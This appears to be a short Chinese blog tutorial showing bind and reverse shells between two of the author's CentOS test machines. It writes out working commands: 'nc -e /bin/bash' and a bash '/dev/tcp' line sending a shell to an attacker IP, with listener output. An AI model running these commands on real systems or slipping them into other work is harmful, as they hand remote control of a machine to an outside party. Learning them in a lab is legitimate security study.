如何使用NC反弹shell

  • 内容
  • 评论
  • 相关

centos1为目标服务器,我这里是centos的一台测试机器。ip为101.200.41.219

centos2为攻击者机器,ip为8.140.129.23

最终是将centos1的shell反弹到centos2上面。

一、正向反弹shell

在centos1上面执行

[root@wltest ~]# nc -lvp  5555 -e /bin/bash
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555


在centos2上面执行

nc  101.200.41.219   5555

然后就可以shell了

二、反向反弹shell

首先在攻击者服务器也就是centos2机器上面执行

[root@iZ2zeckpvpsaii62eyh834Z ~]# nc -lvp  5002
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::5002
Ncat: Listening on 0.0.0.0:5002
Ncat: Connection from 101.200.41.219.
Ncat: Connection from 101.200.41.219:44134.
[root@wltest ~]# 


然后在目标机器centos1执行

[root@wltest ~]# bash -i >& /dev/tcp/8.140.129.23/5002  0>&1


在centos2机器上面执行nc -lvp  5002后会处于一个监听的状态,等在centos1上面执行

 bash -i >& /dev/tcp/8.140.129.23/5002  0>&1后,centos上上面就进入了centos的shell了




本文标签:

版权声明:若无特殊注明,本文皆为《菜鸟站长》原创,转载请保留文章出处。

本文链接:如何使用NC反弹shell - http://www.wlphp.com/?post=329

发表评论

电子邮件地址不会被公开。 必填项已用*标注